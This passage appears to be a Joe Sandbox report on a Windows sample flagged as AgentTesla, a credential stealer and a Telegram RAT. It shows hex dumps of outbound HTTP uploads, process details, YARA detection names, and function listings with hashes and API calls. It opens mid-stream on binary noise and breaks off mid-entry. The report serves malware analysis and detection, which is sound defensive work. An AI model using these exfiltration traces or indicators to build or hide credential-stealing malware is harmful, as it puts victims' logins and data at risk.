((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:03:17 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:03:17 UTC	7422	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:03:17 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 34 30 65 37 61 30 33 30 38 2d 2d 0d 0a Data Ascii: -----------------------------8dcacd40e7a0308--
2024-07-25 22:03:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:03:17 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:03:17 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Target ID:	0
Start time:	17:59:07
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"
Imagebase:	0xb80000
File size:	697'350 bytes
MD5 hash:	67CF14E98914A0AE61CDA009D3ED1DF7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:59:13
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"
Imagebase:	0xc50000
File size:	697'350 bytes
MD5 hash:	67CF14E98914A0AE61CDA009D3ED1DF7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	118
Total number of Limit Nodes:	11

Executed Functions

Function 054AEAEE Relevance: 1.8, Strings: 1, Instructions: 562
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 054AEAF3

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 498587adb61a2e3472d7b06e5cd5d697217615c07d34d13c764704670a7f6da8
Instruction ID: b14b7e4ecb13fdfc371c8d6a53578232274bf55732aab4f41b8146aeea543d84
Opcode Fuzzy Hash: 498587adb61a2e3472d7b06e5cd5d697217615c07d34d13c764704670a7f6da8
Instruction Fuzzy Hash: 5752C674A112299FDB64DF64C898B9DBBB2FF89300F1081D9D509A7365CB34AE81CF91

Function 054ABF68 Relevance: .7, Instructions: 720COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449f85e04c1aeb36921bed8675f78b380660a05f80be175174092d2ef2191aff
Instruction ID: f31907eca7a094edfba6047518fb72fb79cbe25b413e2dcab2cde844c9187898
Opcode Fuzzy Hash: 449f85e04c1aeb36921bed8675f78b380660a05f80be175174092d2ef2191aff
Instruction Fuzzy Hash: C4527036B00215DFDB98DF69D488AAE77B2BF99711B15806AF816DB360DB30DC41CB90

Function 0172ADA8 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFFE

Memory Dump Source

Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e71e0ff16a5387c1f6711840026206f271cedf4faf9836b1b466835d11b6f9a5
Instruction ID: 1d8a2c75ddb6143dd7ea9fd4992bb0ac26047d905368769d5ec258c2241eafd2
Opcode Fuzzy Hash: e71e0ff16a5387c1f6711840026206f271cedf4faf9836b1b466835d11b6f9a5
Instruction Fuzzy Hash: B5714670A00B158FE724DF2AD45575AFBF1FF88204F108A2DD55AD7A40D735E84ACB90

Function 017244E4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017259C9

Memory Dump Source

Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 09df58bc567228c02d039d58f5ebea0c319fb7b40920a3bfe0b51f7ac56d1399
Instruction ID: af831741ae1f2279a577916a7b2f050644ff9d3588c3635b47617fb123744866
Opcode Fuzzy Hash: 09df58bc567228c02d039d58f5ebea0c319fb7b40920a3bfe0b51f7ac56d1399
Instruction Fuzzy Hash: 3E41CEB0C0072DCBEB24CFA9C885BDDBBB5AB49704F20816AD508AB255DB756946CF90

Function 0172590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017259C9

Memory Dump Source

Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 49736e9fd8461f824ebf4c949f62d411ac687d9658613c86341340d1117d1ab0
Instruction ID: 3021ccada1ec47588556f5b59766e18e78566906229319992a9c482f8b1ec960
Opcode Fuzzy Hash: 49736e9fd8461f824ebf4c949f62d411ac687d9658613c86341340d1117d1ab0
Instruction Fuzzy Hash: A741C170C00719CBEB24CFA9C8857CDFBB1BF49304F20816AD548AB255D7755946CF90

Function 0172B790 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0172D646,?,?,?,?,?), ref: 0172D707

Memory Dump Source

Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: eaa7de7e7d448bde33d48bf7906292f79d2270b532f1364779663d0f3cf92bdd
Instruction ID: 9df80e1578f5bbd40c8a9d2cda5128a6a3ecf13ae94f136d25c76356ac5cf9e4
Opcode Fuzzy Hash: eaa7de7e7d448bde33d48bf7906292f79d2270b532f1364779663d0f3cf92bdd
Instruction Fuzzy Hash: 5721E5B5900258EFDB10CFAAD884ADEFBF4EB48310F14845AE914B7350D378A954CFA5

Function 0172D678 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0172D646,?,?,?,?,?), ref: 0172D707

Memory Dump Source

Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ad6c13c5023346a1ccffa6399f2af37a6509b4a568c205f8882c0bd2f71721e8
Instruction ID: 6497bd3f09990304e27bd38388c9cc36de94156eaf52d8d138bf831bd3b6be0a
Opcode Fuzzy Hash: ad6c13c5023346a1ccffa6399f2af37a6509b4a568c205f8882c0bd2f71721e8
Instruction Fuzzy Hash: D921D2B5900248DFDB10CFAAD984ADEBBF5EB48310F14851AE958B3350D378A945CF61

Function 0172A168 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0172B079,00000800,00000000,00000000), ref: 0172B28A

Memory Dump Source

Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d3dd381610745d384e057ec9e7621091a497486a23f16ffb9466dca191d3be7f
Instruction ID: dd915e3962ca768a407a8610d43d360c211a1563230bc9af6898b38e5a9fa668
Opcode Fuzzy Hash: d3dd381610745d384e057ec9e7621091a497486a23f16ffb9466dca191d3be7f
Instruction Fuzzy Hash: BA1114B6804349DFDB10CF9AD444ADEFBF4EB89310F10842AD519A7200C379A545CFA5

Function 0172B219 Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0172B079,00000800,00000000,00000000), ref: 0172B28A

Memory Dump Source

Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 92e341fec89d302419177f7b2d8811b10ff28c9c2cdda26dd9c03956ef3174da
Instruction ID: d66f36429e6d4724d5ad2dfc67fac537defb006f237903504fd5f81d6f0defe2
Opcode Fuzzy Hash: 92e341fec89d302419177f7b2d8811b10ff28c9c2cdda26dd9c03956ef3174da
Instruction Fuzzy Hash: 5E1100B68043498FDB10CFAAC884ADEFBF4AB48310F14842AD529A7200C379A546CFA4

Function 02F12BB4 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02F13679,?,?), ref: 02F13820

Memory Dump Source

Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 14206407b4754685600b051a90e40e4100d963f3c7047a1c4944b7bc1132b21c
Instruction ID: dceb8c6fb2e5a5935a806810e2d4a447e28213346dfe12ad084768fb55ab2ae4
Opcode Fuzzy Hash: 14206407b4754685600b051a90e40e4100d963f3c7047a1c4944b7bc1132b21c
Instruction Fuzzy Hash: 8B1155B2800349DFDB20CF9AC484BDEBBF4EB48320F10845ADA18A7340D338A944CFA5

Function 02F137C0 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02F13679,?,?), ref: 02F13820

Memory Dump Source

Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 61ab2942fa7401bfc7eef9ddf20a8b96b678ef5b9278daeac68e294ccb39b68b
Instruction ID: 707d452851067b290da15f0985e740a2f4bba697a2527cb6b57eaa6d5b08b965
Opcode Fuzzy Hash: 61ab2942fa7401bfc7eef9ddf20a8b96b678ef5b9278daeac68e294ccb39b68b
Instruction Fuzzy Hash: C51136B6800249CFDB20CFA9D485BDEBBF4EF88324F24846AD558A7741C339A545CFA5

Function 02F11780 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 02F117E5

Memory Dump Source

Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 570414f95ca0f2e5495e6caf9c46f2e7243ab1f596ab8f4652507f7a0142c776
Instruction ID: a423a0b5ef69700bf61af11ccd8e3440f74aeef6031d03067a7d16cfd96fa318
Opcode Fuzzy Hash: 570414f95ca0f2e5495e6caf9c46f2e7243ab1f596ab8f4652507f7a0142c776
Instruction Fuzzy Hash: 0011FDB58003499FDB10CF9AD889B9ABBF8EB48314F10845AE958A7611C379A944CFA1

Function 0172AF98 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFFE

Memory Dump Source

Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6cfe53eebfd378febc4aaf947900c4298a9b35e33a1e5585d167735fbdf4c27b
Instruction ID: 8f966e0e65a1d85f408813357150a59bee9a3300bab3dfced31ee57a99f54bd0
Opcode Fuzzy Hash: 6cfe53eebfd378febc4aaf947900c4298a9b35e33a1e5585d167735fbdf4c27b
Instruction Fuzzy Hash: 12110FB5C006498FDB20CF9AC444BDEFBF4AB88214F10842AD928A7610D379A545CFA1

Function 02F11788 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 02F117E5

Memory Dump Source

Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9dabbbf555aa8da10c7da0e7778597086669f0c3593c32e6c19903f6d4da6f3b
Instruction ID: 500a57d5efe09c70eb1b97f38bdf882ad8d827455e92e30ce3017ffad344cf9b
Opcode Fuzzy Hash: 9dabbbf555aa8da10c7da0e7778597086669f0c3593c32e6c19903f6d4da6f3b
Instruction Fuzzy Hash: 9711EDB58002499FDB10CF9AC885BDFBBF8EB48324F10845AE618A7200C379A944CFA1

Function 054AA0B0 Relevance: .8, Instructions: 778COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c895f2756d192565afd3ecca5f37084bc3750181c90fb26cca334ce072789ff3
Instruction ID: 8193520440b659a534c3d18ab8a6ba04cbf75c6195557483515ba87ce82fc057
Opcode Fuzzy Hash: c895f2756d192565afd3ecca5f37084bc3750181c90fb26cca334ce072789ff3
Instruction Fuzzy Hash: 716230B6E04B458ADBB59F79948C3DEBAA2BB52300F14495FD1BACA390DB34D4C1CB05

Function 054AA0F0 Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc9ce99cc617388c2ad4afe4f68ee80eb0c3f5d77b3c8194d1db8a7849e6410d
Instruction ID: 33f044a7b6eee577d9dbff0bab177de7e2ad6c144c6229c0f8e278add8fe7100
Opcode Fuzzy Hash: fc9ce99cc617388c2ad4afe4f68ee80eb0c3f5d77b3c8194d1db8a7849e6410d
Instruction Fuzzy Hash: 25125DB1A05B824AD7B55F69858C3DFB691BB17300F24895BC2FAC93A5C734D0C6CB49

Function 054AB940 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17364077d385785c841958a302027ff47b088ddaf9f9f0a5751108ce66740fa7
Instruction ID: 16fca3f7254bf491aead0a22cfa62a5b504724cb3cc60542bca47aa4e6e73b9f
Opcode Fuzzy Hash: 17364077d385785c841958a302027ff47b088ddaf9f9f0a5751108ce66740fa7
Instruction Fuzzy Hash: 1C612A36B00119DFCB54DFA8D554AEE7BB6FF88611F14806AE906A7354DB319C41CB90

Function 054AB168 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d885dae69d8601170196a15a2f316d3117a483b9549112d1b4412e0c4fee76
Instruction ID: 46b1455be5e2829fe7d4d88cbce262dbff44ba6a8ebf677df8c98d6d07fac447
Opcode Fuzzy Hash: b8d885dae69d8601170196a15a2f316d3117a483b9549112d1b4412e0c4fee76
Instruction Fuzzy Hash: F2516631A00205DFCB14EF68D598AEEBBB6FF95300F10855EE506AB354EB70A945CB91

Function 054AC0A7 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1729bc00b8da31bca7cc91713f1914916bb38aedd2aaabf049fd16c0846803a
Instruction ID: c66d67083c76feb247573baf260f7acead39713f25356d9a740326d08c997941
Opcode Fuzzy Hash: d1729bc00b8da31bca7cc91713f1914916bb38aedd2aaabf049fd16c0846803a
Instruction Fuzzy Hash: A2414B32B00119DFCB45DF64E884AAE7BB7FF98250F14842AF9169B394DB348C56CB90

Function 011FD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b503f265644ad14e4ce940f27a2c1fdefa6e013d29332ac7d2bfad14644c9e2
Instruction ID: b84f1da0dc1a0c9a54a7f1a1d60b56c354ada72aab8ca6f28d6e8a25f3d573e7
Opcode Fuzzy Hash: 5b503f265644ad14e4ce940f27a2c1fdefa6e013d29332ac7d2bfad14644c9e2
Instruction Fuzzy Hash: F121F8B1504204EFDF09DF54E9C0B66BF65FB84314F24C56DDA090B656C336E456CBA2

Function 011FD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 987fd88227542a7e25c4ebc91d4c204203ffbedb01d230f70ca76b38972a0aa2
Instruction ID: fc775ae0173b2e68cc2ed770f95ee84499b64051f5a26f3f042e5942e3d9c94d
Opcode Fuzzy Hash: 987fd88227542a7e25c4ebc91d4c204203ffbedb01d230f70ca76b38972a0aa2
Instruction Fuzzy Hash: 2D21F471500244EFDF09DF54E9C4B26BF75FB84318F20856DDA050B266C336D456CAA2

Function 054ABD68 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4674a9f2491335219c8e18bc5931c2ad7328f8857ee89681c428369f7d24b7c
Instruction ID: 1fd5930adff67256b941d19664ffc3136b4b36bcac442d74bb59ac147cfc9e63
Opcode Fuzzy Hash: a4674a9f2491335219c8e18bc5931c2ad7328f8857ee89681c428369f7d24b7c
Instruction Fuzzy Hash: BC216D36B4424A8FDB50DFA8C884AAE7BF2FB55211F0540A6E905DB362D734DC81CBA1

Function 0120D1EC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193462782.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120d000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd72c747e65d2a7dcf4c1d5e77db15e59afebb9f817d40200b164a39c95e69a2
Instruction ID: 7b8d08a383199f7993f9d5296aa129f07a8655f0dd935ba0167c70d741672c50
Opcode Fuzzy Hash: cd72c747e65d2a7dcf4c1d5e77db15e59afebb9f817d40200b164a39c95e69a2
Instruction Fuzzy Hash: 13213475615308EFDB02DFE8D9C0B26BB61FB84324F20C66DD9090B283C376D846CAA1

Function 0120D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193462782.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120d000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c1a879e0f24405d9a1a5a3ccfa8e0676492e9f17ddf43483fa4d55c2368691
Instruction ID: 3993d5d9409f269ca69cf3fe83d3e4de20119d7af687efb992ef098ffd70318b
Opcode Fuzzy Hash: 70c1a879e0f24405d9a1a5a3ccfa8e0676492e9f17ddf43483fa4d55c2368691
Instruction Fuzzy Hash: 7B21D375614208EFDB16DFA8D9C0B16BB66EB84314F20C66DD90D4B287C376D446CA61

Function 054AB931 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 374e91a9bc59d95a81739ccb84207157d731acb75bdff1db065f2e75daa2af22
Instruction ID: af55fb97b7f501d099aa8a4d7171f8caf8f404ad79da6a632fcd748a1eca1eab
Opcode Fuzzy Hash: 374e91a9bc59d95a81739ccb84207157d731acb75bdff1db065f2e75daa2af22
